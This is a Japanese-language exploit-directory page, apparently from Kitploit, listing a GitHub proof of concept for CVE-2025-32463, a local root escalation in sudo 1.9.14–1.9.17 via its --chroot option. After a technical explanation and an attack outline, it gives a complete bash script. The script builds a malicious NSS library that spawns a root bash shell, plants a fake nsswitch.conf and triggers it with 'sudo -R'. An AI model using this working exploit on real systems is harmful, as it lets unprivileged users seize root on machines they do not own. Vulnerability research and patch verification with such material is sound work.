Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-32463 — CVE-2025-32463 の概念実証エクスプロイト。sudo 1.9.14-1.9.17 における、chroot の設定ミスと悪意のある NSS ライブラリの注入を利用したローカル権限昇格。 | Kitploit
ツール/GitHubGitHub/mr-alperen/cve-2025-32463
特権昇格脆弱性分析エクスプロイト論文と研究学習と教育バイナリエクスプロイト
GitHubmr-alperen/cve-2025-32463

CVE-2025-32463

CVE-2025-32463 の概念実証エクスプロイト。sudo 1.9.14-1.9.17 における、chroot の設定ミスと悪意のある NSS ライブラリの注入を利用したローカル権限昇格。

リポジトリを見る
18ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

📌 CVE-2025-32463 — Sudo --chroot ローカル権限昇格

ExploitDB ID: 52352


🧠 概要

このリポジトリは、Sudo 1.9.14 – 1.9.17 のバージョンに影響する深刻なローカル権限昇格 (LPE) 脆弱性を文書化しています。

この脆弱性は、sudo -R (--chroot) オプションの誤った実装に起因し、sudoers ファイルで許可されていなくても、攻撃者がroot 権限でコマンドを実行することを可能にします。

🔥 結果: 権限のないユーザー → root シェル


🧩 影響を受けるコンポーネント

  • ソフトウェア: sudo
  • 影響を受けるバージョン:
    • 1.9.14
    • 1.9.15
    • 1.9.16
    • 1.9.17
  • CVE ID: CVE-2025-32463
  • プラットフォーム: Linux (特に NSS を使用するシステム)
  • テスト済みシステム: Kali Rolling 2025

⚙️ 脆弱性の技術的原因

Sudo の --chroot (-R) パラメータは、ユーザーに自身で指定したルートディレクトリ下でコマンドを実行する権限を与えます。

しかし、sudo 1.9.14 で行われた変更の結果:

  • sudoers ファイルがまだ完全に検証されていない状態で
  • chroot() 呼び出しがユーザーが指定したディレクトリを介して行われます

この状況により、攻撃者は自身が作成した偽の:

/etc/nsswitch.conf

ファイルを通じて、悪意のある NSS ライブラリ (libnss_*.so) を root 権限でロードさせることができます。


🧨 攻撃シナリオ (概要)

  1. 一時的なディレクトリを作成する
  2. 偽の nsswitch.conf を準備する
  3. 悪意のある NSS 共有ライブラリをコンパイルする
  4. sudo -R <dir> <command> を呼び出す
  5. NSS ライブラリが root 権限でロードされる
  6. Root シェルを取得 🚀

🧪 Proof of Concept (PoC)

⚠️ 教育およびテスト環境でのみ使用してください

root@kitploit:~
#!/bin/bash
# sudo-chwoot.sh – CVE-2025-32463 の PoC

set -e

STAGE=$(mktemp -d /tmp/sudowoot.stage.XXXXXX)
cd "$STAGE"

cat > woot1337.c <<'EOF'
#include <stdlib.h>
#include <unistd.h>

__attribute__((constructor))
void woot(void) {
    setreuid(0,0);
    setregid(0,0);
    chdir("/");
    execl("/bin/bash","/bin/bash",NULL);
}
EOF

mkdir -p woot/etc libnss_
echo "passwd: /woot1337" > woot/etc/nsswitch.conf
cp /etc/group woot/etc

gcc -shared -fPIC -Wl,-init,woot -o libnss_/woot1337.so.2 woot1337.c

sudo -R woot woot
ツールをダウンロード